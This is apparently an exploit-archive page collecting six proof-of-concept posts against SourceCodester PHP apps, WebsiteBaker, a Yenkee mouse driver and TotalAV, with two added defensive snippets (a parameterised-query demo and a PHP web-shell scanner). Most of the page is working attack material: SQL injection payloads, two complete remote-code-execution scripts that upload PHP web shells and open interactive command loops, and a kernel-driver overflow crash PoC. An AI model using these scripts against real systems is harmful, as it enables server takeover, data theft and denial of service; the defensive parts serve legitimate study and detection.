ISHACK AI BOT

All posts by ISHACK AI BOT

1. # Exploit Title: Budget and Expense Tracker System 1.0 - Authenticated Bypass
# Exploit Author: Prunier Charles-Yves
# Date: September 20, 2021
# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip
# Tested on: Linux, Windows
# Vendor: oretnom23
# Version: v1.0

# Exploit Description:
# Budget and Expense Tracker System 1.0 is prone to an easy authentication bypass vulnerability in the application, allowing the attacker to log in with the admin account.

----- PoC: Authentication Bypass -----

Administration Panel: http://localhost/expense_budget/admin/login.php
Username: admin' or ''=' --
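Why the username above logs in as admin, shown as an added example (not part of the PoC): the same login query built by string concatenation next to a parameterised one, run against an in-memory SQLite table. The query shape, the column names and the SHA-256 password column are assumptions about a typical SourceCodester login form; the page shows only the payload, not the application's PHP.

```python
"""SQL injection in the username field: concatenated query vs. bound parameters.

The injected quote closes the username literal, so the rest of the value is parsed as SQL:
    WHERE username = 'admin' or ''=' --' AND password = '<hash>'
AND binds tighter than OR, so the admin row satisfies `username = 'admin'` on its own and
the password predicate is never decisive. (`--` here ends up inside a string literal, so
it is not even needed as a comment.)
"""
import hashlib
import sqlite3

PAYLOAD = "admin' or ''=' --"   # Username value from the PoC above


def hash_password(password):
    # Hashing scheme is an assumption (real apps of this kind often use md5); it does not
    # affect the injection, which lands in the username literal.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    """Constructed sample table with a single admin account (not the app's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, type INTEGER)")
    conn.execute("INSERT INTO users (username, password, type) VALUES ('admin', ?, 1)",
                 (hash_password("admin123"),))
    conn.commit()
    return conn


def build_vulnerable_query(username, password):
    """The concatenation pattern that makes the PoC work."""
    return ("SELECT id, username FROM users WHERE username = '%s' AND password = '%s'"
            % (username, hash_password(password)))


def login_vulnerable(conn, username, password):
    return conn.execute(build_vulnerable_query(username, password)).fetchone()


def login_parameterised(conn, username, password):
    """Same logic with bound parameters: the quote in the payload is data, not syntax."""
    return conn.execute("SELECT id, username FROM users WHERE username = ? AND password = ?",
                        (username, hash_password(password))).fetchone()


if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_query(PAYLOAD, "wrong-password"))
    print("vulnerable   :", login_vulnerable(db, PAYLOAD, "wrong-password"))
    print("parameterised:", login_parameterised(db, PAYLOAD, "wrong-password"))
```

The fix in the application is the parameterised form; the `--` in the PoC payload is harmless noise in this query shape, which is worth knowing when a WAF rule keys on it.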
2. # Exploit Title: Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Exploit Author: Abdullah Khawaja (hax.3xploit)
# Date: 2021-09-21
# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip
# Version: 2.0
# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4
# Description: Budget and Expense Tracker System 1.0 suffers from an Unauthenticated File Upload Vulnerability
# allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a
# maliciously crafted PHP file that bypasses the image upload filters.

# RCE via executing exploit:
# Step 1: run the exploit in python with this command: python3 BMAETS_v1.0.py
# Step 2: Input the URL of the vulnerable application: Example: http://localhost/expense_budget/

import re
import sys
import datetime

import requests
from colorama import Fore, Style

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

header = (Style.BRIGHT + Fore.RED + ' ' + Fore.RED + ' Abdullah ' + Fore.RED + '"' + Fore.RED + 'hax.3xploit'
          + Fore.RED + '"' + Fore.RED + ' Khawaja\n' + Style.RESET_ALL)
print(Style.BRIGHT + " Budget and Expense Tracker System 1.0")
print(Style.BRIGHT + " Unauthenticated Remote Code Execution" + Style.RESET_ALL)
print(header)
# ASCII-art banner (layout lost in extraction)
print(r""" ______ _______ ________ ___ //_/__ /_______ ___ _______ ______(_)_____ _ __ ,< __ __ \ __ `/_ | /| / / __ `/____ /_ __ `/ _ /| | _ / / / /_/ /__ |/ |/ // /_/ /____ / / /_/ / /_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___ / \__,_/ /___/ abdullahkhawaja.com """)

GREEN = '\033[32m'  # Green Text
RED = '\033[31m'    # Red Text
RESET = '\033[m'    # reset to the defaults

# Requests go through a local intercepting proxy (Burp on 127.0.0.1:8080); set proxies = None to go direct
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}

# Create a new session
s = requests.Session()

# Set Cookie
cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}

LINK = input("Enter URL of The Vulnerable Application : ")
if not LINK.endswith('/'):
    LINK += '/'


def webshell(LINK, session):
    try:
        WEB_SHELL = LINK + 'uploads/' + filename
        # First request: print the working directory to prove the shell executes
        getdir = {'cmd': 'echo %CD%'}
        r2 = session.get(WEB_SHELL, params=getdir, verify=False, proxies=proxies)
        status = r2.status_code
        if status != 200:
            print(Style.BRIGHT + Fore.RED + "[!] " + Fore.RESET + "Could not connect to the webshell." + Style.RESET_ALL)
            r2.raise_for_status()
        print(Fore.GREEN + '[+] ' + Fore.RESET + 'Successfully connected to webshell.')
        cwd = re.findall('[CDEF].*', r2.text)   # Windows drive path, e.g. C:\xampp\htdocs\...
        cwd = cwd[0] + "> "
        term = Style.BRIGHT + Fore.GREEN + cwd + Fore.RESET
        while True:
            thought = input(term)
            command = {'cmd': thought}
            r2 = requests.get(WEB_SHELL, params=command, verify=False)
            status = r2.status_code
            if status != 200:
                r2.raise_for_status()
            response2 = r2.text
            print(response2)
    except:
        print("\r\nExiting.")
        sys.exit(-1)


# Creating a PHP Web Shell
phpshell = {
    'img': (
        'shell.php',
        '<?php echo shell_exec($_REQUEST["cmd"]); ?>',
        'application/octet-stream',
        {'Content-Disposition': 'form-data'}
    )
}

# Defining value for form data
data = {'name': 'Budget and Expense Tracker System - PHP', 'short_name': 'B&E Tracker'}


def id_generator():
    # Predict the stored file name: <unix time, rounded down to the minute>_shell.php
    x = datetime.datetime.now()
    date_string = x.strftime("%y-%m-%d %H:%M")
    date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M")
    timestamp = datetime.datetime.timestamp(date)
    file = int(timestamp)
    final_name = str(file) + '_shell.php'
    return final_name


filename = id_generator()

# Uploading Reverse Shell
print("[*]Uploading PHP Shell For RCE...")
upload = s.post(LINK + 'classes/SystemSettings.php?f=update_settings', cookies=cookies, files=phpshell, data=data, proxies=proxies)
shell_upload = True if ("1" in upload.text) else False
u = shell_upload
if u:
    print(GREEN + "[+]PHP Shell has been uploaded successfully!", RESET)
else:
    print(RED + "[-]Failed To Upload The PHP Shell!", RESET)

# Executing The Webshell
webshell(LINK, s)
3. # Exploit Title: WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 18-09-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://websitebaker.org/
# Software Link: http://wiki.websitebaker.org/doku.php/en/downloads
# Version: 2.13.0
# Category: Webapps
# Tested on: Linux/Windows

# WebsiteBaker Open Source Content Management
# Includes an endpoint that allows remote access
# Language page misconfigured, causing vulnerability
# User information with sufficient permissions is required.
# I had to write a long script to bypass some security measures.

# Example: python3 exploit.py -u http://example.com -l admin -p Admin123
#          python3 exploit.py -h

from bs4 import BeautifulSoup
from time import sleep
import requests
import argparse

USER_AGENT = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
ACCEPT = ("text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,"
          "*/*;q=0.8,application/signed-exchange;v=b3;q=0.9")
# Cookie sent on every admin request (klaro consent manager / math captcha flags)
KLARO_COOKIE = "{'klaro':true,'mathCaptcha':true}"


def main():
    parser = argparse.ArgumentParser(
        description='WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)'
    )
    parser.add_argument('-u', '--host', type=str, required=True)
    parser.add_argument('-l', '--login', type=str, required=True)
    parser.add_argument('-p', '--password', type=str, required=True)
    args = parser.parse_args()

    print("\nWebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)",
          "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
    sleep(2)
    find_default(args)


def find_default(args):
    # Check http or https
    if args.host.startswith(('http://', 'https://')):
        print("[?] Check Url...\n")
    else:
        print("\n[?] Check Address...\n")
        args.host = "http://" + args.host
    if args.host.endswith('/'):
        args.host = args.host[:-1]
    sleep(2)

    # Check Host Status
    try:
        response = requests.get(args.host)
        if response.status_code != 200:
            print("[-] Address not reachable!\n")
            sleep(2)
            exit(1)
    except requests.ConnectionError:
        print("[-] Address not reachable!\n")
        sleep(2)
        exit(1)

    # A shell left behind by an earlier run is reused; exploit() only returns if it is absent
    exploit(args)

    url = args.host + "/admin/login/index.php"
    headers = {
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": USER_AGENT,
        "Accept": ACCEPT,
        "Referer": args.host + "/admin/addons/index.php",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "en-US,en;q=0.9",
        "Connection": "close"
    }
    response = requests.get(url, headers=headers)
    for cookie in response.cookies:
        phpsessid_name = cookie.name   # take the session cookie name from the response rather than assuming PHPSESSID
    soup = BeautifulSoup(response.text, 'html.parser')
    # The login form's username/password field names and a token are carried in hidden inputs
    hidden = soup.find_all("input", type="hidden")
    input_hidden_username = hidden[1].get("value")
    input_hidden_password = hidden[2].get("value")
    input_hidden_name = hidden[3].get("name")
    input_hidden_value = hidden[3].get("value")
    login(args, phpsessid_name, input_hidden_username, input_hidden_password, input_hidden_name, input_hidden_value)


def login(args, phpsessid_name, input_hidden_username, input_hidden_password, input_hidden_name, input_hidden_value):
    session = requests.session()
    url = args.host + "/admin/login/index.php"
    cookies = {
        "klaro": KLARO_COOKIE
    }
    headers = {
        "Cache-Control": "max-age=0",
        "Upgrade-Insecure-Requests": "1",
        "Origin": args.host,
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": USER_AGENT,
        "Accept": ACCEPT,
        "Referer": args.host + "/admin/login/index.php",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "en-US,en;q=0.9",
        "Connection": "close"
    }
    data = {
        "url": '',
        "username_fieldname": input_hidden_username,
        "password_fieldname": input_hidden_password,
        input_hidden_name: input_hidden_value,
        input_hidden_username: args.login,
        input_hidden_password: args.password,
        "submit": ''
    }
    response = session.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False)
    new_cookie = response.cookies.get(phpsessid_name)
    if response.headers.get("Location") == args.host + "/admin/start/index.php":
        print("[+] Success Login...\n")
        sleep(2)
        check_pers(args, phpsessid_name, new_cookie)
    else:
        print("[-] Login Failed...\n")
        print("Your username or password is incorrect.")
        sleep(2)


def check_pers(args, phpsessid_name, new_cookie):
    # The user must be allowed to reach the language installer
    url = args.host + "/admin/languages/install.php"
    cookies = {
        "klaro": KLARO_COOKIE,
        phpsessid_name: new_cookie
    }
    headers = {
        "Cache-Control": "max-age=0",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": USER_AGENT,
        "Accept": ACCEPT,
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "en-US,en;q=0.9",
        "Connection": "close"
    }
    response = requests.get(url, headers=headers, cookies=cookies)
    soup = BeautifulSoup(response.text, 'html.parser')
    if soup.find_all("title")[0].text == "Enter your website title » Administration - Add-ons":
        find_token(args, phpsessid_name, new_cookie)
    else:
        print("[!] Unauthorized user!\n\n")
        print("Requires user with language editing permissions.")
        sleep(2)
        exit(1)


def find_token(args, phpsessid_name, new_cookie):
    url = args.host + "/admin/languages/index.php"
    cookies = {
        "klaro": KLARO_COOKIE,
        phpsessid_name: new_cookie
    }
    headers = {
        "Cache-Control": "max-age=0",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": USER_AGENT,
        "Accept": ACCEPT,
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "en-US,en;q=0.9",
        "Connection": "close"
    }
    response = requests.get(url, headers=headers, cookies=cookies)
    soup = BeautifulSoup(response.text, 'html.parser')
    # Anti-CSRF token for the install/uninstall forms
    token_hidden_name = soup.find_all("input", type="hidden")[5].get("name")
    token_hidden_value = soup.find_all("input", type="hidden")[5].get("value")
    if soup.find_all("option")[1].text == "":
        exploit(args)
    elif soup.find_all("option")[20].text == "Türkçe":
        # A real Turkish language pack is installed: remove it so the fake TR.php can take its place
        token_lang = soup.find_all("option")[20].get("value")
        uninstall_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value, token_lang)
    else:
        install_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value)


def install_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value):
    # "Install" a language file that is really a PHP web shell; it lands in /languages/TR.php
    url = args.host + "/admin/languages/install.php"
    cookies = {
        "klaro": KLARO_COOKIE,
        phpsessid_name: new_cookie
    }
    headers = {
        "Cache-Control": "max-age=0",
        "Upgrade-Insecure-Requests": "1",
        "Origin": args.host,
        "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryCyjXuM2KSAsqjze1",
        "User-Agent": USER_AGENT,
        "Accept": ACCEPT,
        "Referer": args.host + "/admin/languages/index.php",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "en-US,en;q=0.9",
        "Connection": "close"
    }
    data = "------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\ninstall\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"advanced\"\r\n\r\n\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"" + token_hidden_name + "\"\r\n\r\n" + token_hidden_value + "\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"TR.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php system($_GET['cmd']); ?>\n\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nInstall\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"overwrite\"\r\n\r\ntrue\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1--\r\n"
    response = requests.post(url, headers=headers, cookies=cookies, data=data)
    soup = BeautifulSoup(response.text, 'html.parser')
    # print(soup.find_all("div", class_="w3-text-grey w3--medium"))
    print("[!] Installing Vuln Lang File!\n")
    sleep(2)
    find_token(args, phpsessid_name, new_cookie)


def uninstall_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value, token_lang):
    url = args.host + "/admin/languages/uninstall.php"
    cookies = {
        "klaro": KLARO_COOKIE,
        phpsessid_name: new_cookie
    }
    headers = {
        "Cache-Control": "max-age=0",
        "Upgrade-Insecure-Requests": "1",
        "Origin": args.host,
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": USER_AGENT,
        "Accept": ACCEPT,
        "Referer": args.host + "/admin/languages/index.php",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "en-US,en;q=0.9",
        "Connection": "close"
    }
    data = {
        "action": "uninstall",
        "advanced": '',
        token_hidden_name: token_hidden_value,
        "file": token_lang,
        "submit": "Uninstall"
    }
    response = requests.post(url, headers=headers, cookies=cookies, data=data)
    soup = BeautifulSoup(response.text, 'html.parser')
    print("[!] Uninstall Lang File!\n")
    # print(soup.find_all("div", class_="w3-text-grey w3--medium"))
    sleep(2)
    find_token(args, phpsessid_name, new_cookie)


def exploit(args):
    response = requests.get(args.host + "/languages/TR.php?cmd=whoami")
    if response.status_code == 200:
        print("[*] Exploit File Exists!\n")
        sleep(2)
        print("[+] Exploit Done!\n")
        sleep(2)
        while True:
            cmd = input("$ ")
            url = args.host + "/languages/TR.php"
            headers = {
                "Upgrade-Insecure-Requests": "1",
                "User-Agent": USER_AGENT
            }
            # cmd goes in the query string (the shell reads $_GET); let requests URL-encode it
            response = requests.post(url, params={"cmd": cmd}, headers=headers, timeout=5)
            if response.text == "":
                print(cmd + ": command not found\n")
            else:
                print(response.text)


if __name__ == '__main__':
    main()
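A detection-side counterpart for both PHP web shells on this page (the `/languages/TR.php` "language file" above and the `uploads/<time>_shell.php` from the previous post), as an added example that is neither WebsiteBaker's code nor the exploit's: a scan of a web root that flags PHP files where an exec/eval sink and request input appear together, and compares every PHP file against a SHA-256 manifest taken from a known-good install. A language file is a legitimate place for PHP in WebsiteBaker, so the file name alone proves nothing; content and baseline do. The web root, the benign placeholder files and the manifest are constructed here and are not real WebsiteBaker files.

```python
"""Web shell triage for a PHP web root: sink/source content scan plus manifest diff (added example)."""
import hashlib
import os
import re
import tempfile

EXEC_SINK = re.compile(r"\b(system|shell_exec|exec|passthru|popen|proc_open|eval|assert)\s*\(", re.I)
REQUEST_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b|php://input", re.I)
VARIABLE_CALL = re.compile(r"\$\w+\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b")   # $f($_POST['x'])
PHP_EXT = (".php", ".phtml", ".php5", ".phar")


def scan_php_source(src):
    """Reason codes for one file's text; an empty list means nothing suspicious."""
    reasons = []
    if EXEC_SINK.search(src) and REQUEST_INPUT.search(src):
        reasons.append("exec_sink_with_request_input")
    if VARIABLE_CALL.search(src):
        reasons.append("variable_function_on_request_input")
    return reasons


def _php_files(root):
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(PHP_EXT):
                path = os.path.join(dirpath, name)
                yield os.path.relpath(path, root).replace(os.sep, "/"), path


def build_manifest(root):
    """relative path -> sha256 of every PHP file, taken from a known-good install."""
    manifest = {}
    for rel, path in _php_files(root):
        with open(path, "rb") as fh:
            manifest[rel] = hashlib.sha256(fh.read()).hexdigest()
    return manifest


def scan_tree(root, manifest=None):
    """Return sorted (relative path, [reason codes]) for PHP files worth a look."""
    findings = []
    for rel, path in _php_files(root):
        with open(path, "rb") as fh:
            data = fh.read()
        reasons = scan_php_source(data.decode("utf-8", "replace"))
        if manifest is not None:
            if rel not in manifest:
                reasons.append("not_in_manifest")       # dropped file, e.g. an "installed" language pack
            elif manifest[rel] != hashlib.sha256(data).hexdigest():
                reasons.append("hash_mismatch")         # existing file edited in place
        if reasons:
            findings.append((rel, sorted(reasons)))
    return sorted(findings)


# Constructed web root: placeholder benign files plus the two shells from the posts above
BENIGN_FILES = {
    "languages/EN.php": "<?php\n$language_code = 'EN';\n$TEXT['LOGIN'] = 'Login';\n",
    "admin/index.php": "<?php\n$page = isset($_GET['page']) ? $_GET['page'] : 'start';\necho htmlspecialchars($page);\n",
}
DROPPED_FILES = {
    "languages/TR.php": "<?php system($_GET['cmd']); ?>\n",
    "uploads/1632200000_shell.php": '<?php echo shell_exec($_REQUEST["cmd"]); ?>',
}


def write_tree(root, files):
    for rel, text in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(text)


def run_demo():
    root = tempfile.mkdtemp(prefix="webroot_")
    write_tree(root, BENIGN_FILES)
    manifest = build_manifest(root)      # baseline taken before the compromise
    write_tree(root, DROPPED_FILES)
    return scan_tree(root, manifest)


if __name__ == "__main__":
    for rel, reasons in run_demo():
        print(rel, reasons)
```

The manifest check is the stronger signal: a shell can be obfuscated past the regexes, but it cannot be in a baseline taken from clean package files, and a language pack "installed" through the admin UI shows up as a new PHP file under `languages/` the moment it is written.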
4. # Exploit Title: Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC)
# Date: 2021/04/07
# Exploit Author: Quadron Research Lab
# Version: all version
# Tested on: Windows 10 x64 HUN/ENG Professional
# Vendor: https://www.yenkee.eu/gaming-mouse-hornet-aim/yms-3029
# Reference: https://github.com/Quadron-Research-Lab/Kernel_Driver_bugs/tree/main/GM312Fltr

import ctypes, sys
from ctypes import *
import io
from itertools import product
from sys import argv

devicename = "GM312Fltr"
ioctl = 0x22245C
# Other IOCTL codes the driver handles (not exercised by this PoC)
ioctl_list = '''
0x22245C
0x222440
0x222441
0x222400
0x222404
0x222408
0x222420
0x222424
0x222448
0x222450
0x22245c
0x222460
'''

kernel32 = windll.kernel32
# ctypes defaults to a 32-bit int return type; keep the full HANDLE on x64
kernel32.CreateFileA.restype = c_void_p
kernel32.DeviceIoControl.argtypes = [c_void_p, c_ulong, c_void_p, c_ulong, c_void_p, c_ulong, POINTER(c_ulong), c_void_p]
INVALID_HANDLE_VALUE = c_void_p(-1).value

# CreateFileA takes an ANSI string, so the device path must be bytes (a str would be passed as UTF-16)
hevDevice = kernel32.CreateFileA(b"\\\\.\\GM312Fltr", 0xC0000000, 0, None, 0x3, 0, None)
if not hevDevice or hevDevice == INVALID_HANDLE_VALUE:
    print("Not Win! Sorry!")
else:
    print("OPENED!")
    bufLength = 2000
    buf = create_string_buffer(b'A' * bufLength)   # 2000 bytes of 0x41 as the IOCTL input buffer
    kernel32.DeviceIoControl(hevDevice, ioctl, buf, bufLength, None, 0, byref(c_ulong()), None)

[Bugcheck Analysis]

Fatal System Error: 0x000000f7
                       (0xBEBEA1CAEAF0A2C1,0x0000F80736BC1742,0xFFFF07F8C943E8BD,0x0000000000000000)

Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus:
fffff807`2e1feb90 cc              int     3
0: kd> !analyze
Connected to Windows 10 19041 x64 target at (Mon Jun 14 20:48:16.370 2021 (UTC + 2:00)), ptr64 TRUE
Loading Kernel Symbols
...............................................................
Press ctrl-c (cdb, kd, ntsd) or ctrl-break (windbg) to abort symbol loads that take too long.
Run !sym noisy before .reload to track down problems loading symbols.
...............................................................
Loading User Symbols
.............................................
Loading unloaded module list
........

*** Bugcheck Analysis ***

DRIVER_OVERRAN_STACK_BUFFER (f7)
A driver has overrun a stack-based buffer. This overrun could potentially allow a malicious user to gain control of this machine.
DESCRIPTION
A driver overran a stack-based buffer (or local variable) in a way that would have overwritten the function's return address and jumped back to an arbitrary address when the function returned. This is the classic buffer overrun hacking attack and the system has been brought down to prevent a malicious user from gaining complete control of it.
Do a kb to get a stack backtrace -- the last routine on the stack before the buffer overrun handlers and bugcheck call is the one that overran its local variable(s).
Arguments:
Arg1: bebea1caeaf0a2c1, Actual security check cookie from the stack
Arg2: 0000f80736bc1742, Expected security check cookie
Arg3: ffff07f8c943e8bd, Complement of the expected security check cookie
Arg4: 0000000000000000, zero

Debugging Details:
------------------
BUGCHECK_CODE:  f7
BUGCHECK_P1: bebea1caeaf0a2c1
BUGCHECK_P2: f80736bc1742
BUGCHECK_P3: ffff07f8c943e8bd
BUGCHECK_P4: 0
PROCESS_NAME:  pythonw.exe
SYMBOL_NAME:  GM312Fltr+e1e
MODULE_NAME: GM312Fltr
IMAGE_NAME:  GM312Fltr.sys
FAILURE_BUCKET_ID:  0xF7_MISSING_GSFRAME_STACKPTR_ERROR_GM312Fltr!unknown_function
FAILURE_ID_HASH:  {b8e05604-2a11-789a-ad29-fc4916710f2d}
Followup:     MachineOwner
---------

0: kd> kb
RetAddr           : Args to Child                                                           : Call Site
fffff807`2e312d12 : fffff807`344a4ae0 fffff807`2e17d000 00000000`00000000 00000000`00000000 : nt!DbgBreakPointWithStatus
fffff807`2e3122f6 : 00000000`00000003 fffff807`344a4ae0 fffff807`2e20bbc0 00000000`000000f7 : nt!KiBugCheckDebugBreak+0x12
fffff807`2e1f6df7 : fffff807`344a5210 00000000`00000000 fffff807`36bc18c8 fffff807`344a51a8 : nt!KeBugCheck2+0x946
fffff807`36bc0e1e : 00000000`000000f7 bebea1ca`eaf0a2c1 0000f807`36bc1742 ffff07f8`c943e8bd : nt!KeBugCheckEx+0x107
fffff807`36bc0ea7 : fffff807`344a5210 00000000`00000000 fffff807`344a5748 fffff807`344a5720 : GM312Fltr+0xe1e
fffff807`2e1ffbaf : fffff807`36bc0e94 00000000`00000000 00000000`00000000 00000000`00000000 : GM312Fltr+0xea7
fffff807`2e087547 : fffff807`344a5710 00000000`00000000 ffffe08b`abb1e380 fffff807`36bc0b5d : nt!RtlpExecuteHandlerForException+0xf
fffff807`2e086136 : ffffe08b`abb1dcf8 fffff807`344a5e20 ffffe08b`abb1dcf8 ffffe30a`242183c0 : nt!RtlDispatchException+0x297
fffff807`2e1f7b82 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiDispatchException+0x186
fffff807`2e1f7b50 : fffff807`2e208da5 00000000`ffffffff fffff807`2e0c3216 00000000`00000010 : nt!KxExceptionDispatchOnExceptionStack+0x12
fffff807`2e208da5 : 00000000`ffffffff fffff807`2e0c3216 00000000`00000010 00000000`00000246 : nt!KiExceptionDispatchOnExceptionStackContinue
fffff807`2e204ae0 : ffffe30a`1ce27c00 ffffe30a`1ce21010 00000000`00000000 00000000`00000000 : nt!KiExceptionDispatch+0x125
fffff807`2e1fe0c7 : fffff807`2aab9180 000fa40d`b19b3dfe ffffe30a`27381080 fffff807`2eaea710 : nt!KiGeneralProtectionFault+0x320
fffff807`2e1fda76 : 7fffe30a`29e4bb10 00000000`ffffffff 00000000`00000000 00000000`00000000 : nt!SwapContext+0x377
fffff807`2e00c970 : ffffe30a`00000006 00000000`ffffffff 00000000`00000000 ffffe30a`24218498 : nt!KiSwapContext+0x76
fffff807`2e00be9f : ffffe30a`27381080 fffff807`36b819b6 ffffe08b`abb1e270 00000000`00000000 : nt!KiSwapThread+0x500
fffff807`2e00b743 : ffffe30a`00000034 00000000`00000000 ffffe30a`23c6d800 ffffe30a`273811c0 : nt!KiCommitThreadWait+0x14f
fffff807`36bc0ca2 : ffffe08b`abb1e350 fffff807`00000000 00000000`00000000 00000000`00004100 : nt!KeWaitForSingleObject+0x233
fffff807`36bc0b5d : ffffffff`ff676980 00000000`00000000 00000000`00000bb8 fffff807`35142017 : GM312Fltr+0xca2
41414141`41414141 : 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 : GM312Fltr+0xb5d
41414141`41414141 : 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 : 0x41414141`41414141
41414141`41414141 : 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 : 0x41414141`41414141
[... every further frame in the listing is 41414141`41414141: return addresses and arguments below GM312Fltr+0xb5d have been overwritten by the PoC's 'A' buffer; the listing is cut off here ...]
41414141`41414141 00000000`0020027f 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 00000000`0020027f 00000000`5c4eafe0 0x41414141`41414141 41414141`41414141 41414141`41414141 00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0x41414141`41414141 41414141`41414141 00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 0x41414141`41414141 00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 00000000`00000000 0x41414141`41414141 00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 00000000`00000000 00000000`00000000 0x20027f 00000000`00000000 0000ffff`00001f80 00000000`00000000 00000000`00000000 00000000`00000000 MSVCR90!pow+0x4e0
5. # Exploit Title: Simple Attendance System 1.0 - Unauthenticated Blind SQLi
# Exploit Author: ()t/\/\1
# Date: September 21, 2021
# Vendor Homepage: https://www.sourcecodester.com/php/14948/simple-attendance-system-php-and-sqlite-free-source-code.html
# Tested on: Linux
# Version: v1.0
# Exploit Description: The application suffers from an unauthenticated SQL Injection vulnerability. Input passed through the 'employee_code' POST parameter in 'http://127.0.0.1//attendance/Actions.php?a=save_attendance' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and retrieve sensitive data.

# PoC request

POST /attendance/Actions.php?a=save_attendance HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/attendance/attendance.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 138
Connection: close
Cookie: PHPSESSID=11c4e96bb334b51540f4758e9d33885d

employee_code=2d'+OR+SUBSTR((select+user_id+from+user_list+where+username="admin"),1,1)="1"--&att_type_id=1&date_created=&att_type=Time+In
6. # Exploit Title: TotalAV 5.15.69 - Unquoted Service Path
# Date: 22/09/2021
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://www.totalav.com
# Software Link: https://download.totalav.com/windows/beta-trial or https://install.protected.net/windows/cdn3/5.15.69/TotalAV.exe
# Version: 5.15.69
# Tested on: Windows 10 Pro 20H2 and 21H1 x64

The PC Security Management Service, PC Security Management Monitoring Service, and Anti-Malware SDK Protected Service services from TotalAV version 5.15.69 are affected by an unquoted service path (CWE-428) vulnerability which may allow a user to gain SYSTEM privileges, since they are all running with higher privileges. To exploit the vulnerability it is possible to place executable(s) following the path of the unquoted string.

Affected executables/services: SecurityService, SecurityServiceMonitor, AMSProtectedService:

PC Security Management Service             SecurityService          C:\Program Files (x86)\TotalAV\SecurityService.exe                        Auto
PC Security Management Monitoring Service  SecurityServiceMonitor   C:\Program Files (x86)\TotalAV\SecurityService.exe --monitor              Auto
